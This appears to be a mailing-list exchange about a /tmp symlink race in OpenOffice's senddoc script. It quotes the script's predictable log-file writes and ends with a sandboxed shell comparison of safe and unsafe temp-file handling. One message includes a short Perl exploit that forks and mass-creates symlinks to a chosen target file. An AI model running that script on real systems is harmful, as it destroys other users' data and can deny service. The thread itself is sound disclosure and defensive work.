On 06:13 Mon 25 Aug, Rene Engelhard wrote:
RE> Hi,

RE> Dmitry E. Oboukhov wrote:
RE>> For example if a script uses in its work a temp file which is created
RE>> in /tmp directory, then every user can create symlink with the same
RE>> name in this directory in order to destroy or rewrite some system
RE>> or user file. Symlink attack may also lead not only to the data
RE>> destruction but to denial of service as well.
RE>>
RE>> Even if you create files or directories with help of function 'RANDOM'
RE>> or pid(), then your system is not protected. Attacker can create many
RE>> symlinks in order to destroy your data or create 'denial of service'
RE>> for your package scripts.
RE> [...]
RE>> Binary-package: openoffice.org-common (1:2.4.1-6)
RE>>     file: /usr/lib/openoffice/program/senddoc

RE> I guess you mean this snippet in the mutt handling part of senddoc?

$ grep -A5 -B5 /tmp/ /usr/lib/openoffice/program/senddoc
#!/bin/sh
URI_ENCODE="`dirname $0`/uri-encode"
echo "$@" > /tmp/log.obr.$$
echo "$#" >> /tmp/log.obr.$$

# tries to locate the executable specified
# as first parameter in the user's path.
which() {
    if [ ! -z "$1" ]; then

example for attacker script:

#!...perl
$file_for_attack='/path/to/file';
while(1) {
    exit unless fork;
    symlink $file_for_attack, "/tmp//tmp/log.obr.$_" for ($$ .. $$+10000);
}

RE> [...]
RE>         --body)
RE>             TEMPLATE="`basename $0`.mutt.XXXXXXXX"
RE>             BODY=`mktemp -q -t ${TEMPLATE}`
RE>             echo "$2" > $BODY
RE>             shift
RE> [...]
RE>         x-terminal-emulator -e ${MAILER} \
RE>             ${FROM:+-e} ${FROM:+"set from=\"${FROM}\""} \
RE>             ${CC:+-c} ${CC:+"${CC}"} \
RE>             ${BCC:+-b} ${BCC:+"${BCC}"} \
RE>             ${SUBJECT:+-s} ${SUBJECT:+"${SUBJECT}"} \
RE>             ${BODY:+-i} ${BODY:+"${BODY}"} \
RE>             ${ATTACH:+-a} ${ATTACH:+"${ATTACH}"} \
RE>             ${TO:+"${TO}"} &
RE>         rm -f $BODY
RE> [...]

RE> I so far thought mktemp was safe enough? (of course, we get
RE> senddoc.mutt.<number>, but...

RE> Regards,

RE> Rene

--
. ''`. Dmitry E. Oboukhov
: :' : [EMAIL PROTECTED]
`. `~' GPGKey: 1024D / F8E26537 2006-11-21
  `- 1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
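Added example (not part of the original message and not code from senddoc): the predictable `log.obr.$$` write from the grep output beside two safer forms, run entirely inside a private directory made by `mktemp -d`. The function names, the sandbox layout and the sample file contents are assumptions made for the illustration.

```shell
#!/bin/sh
# Added illustration; nothing here touches the real /tmp/log.obr.* path.

# Predictable name, as in the two debug lines of senddoc: the redirection
# follows whatever already sits at that path, including a symlink.
log_predictable() {   # $1 = directory, $2 = text to log
    echo "$2" > "$1/log.obr.$$"
}

# Same fixed name, but with noclobber (set -C) the shell refuses to write
# through an existing file or a link to one; the caller must handle failure.
log_noclobber() {     # $1 = directory, $2 = text to log
    ( set -C; echo "$2" > "$1/log.obr.$$" ) 2>/dev/null
}

# mktemp picks an unpredictable name and creates the file exclusively,
# so a link planted in advance is never opened. Prints the path it used.
log_mktemp() {        # $1 = directory, $2 = text to log
    f=$(mktemp "$1/log.obr.XXXXXXXX") || return 1
    echo "$2" > "$f"
    echo "$f"
}

# Runs all three against a constructed, pre-planted link and prints
# "<file after predictable write>|<noclobber refused?>|<file after mktemp>".
demo() {
    box=$(mktemp -d) || return 1
    echo "important" > "$box/victim"            # constructed sample file
    ln -s "$box/victim" "$box/log.obr.$$"       # link placed before the write

    log_predictable "$box" "args"
    r1=$(cat "$box/victim")                     # content was replaced

    echo "important" > "$box/victim"            # restore for the next checks
    log_noclobber "$box" "args" && blocked=no || blocked=yes
    log_mktemp "$box" "args" > /dev/null
    r3=$(cat "$box/victim")                     # content is untouched

    rm -rf "$box"
    echo "$r1|$blocked|$r3"
}

demo
```

The `--body` branch quoted above already follows the `mktemp` pattern; the two `echo ... > /tmp/log.obr.$$` lines at the top of the script are the ones that match `log_predictable`.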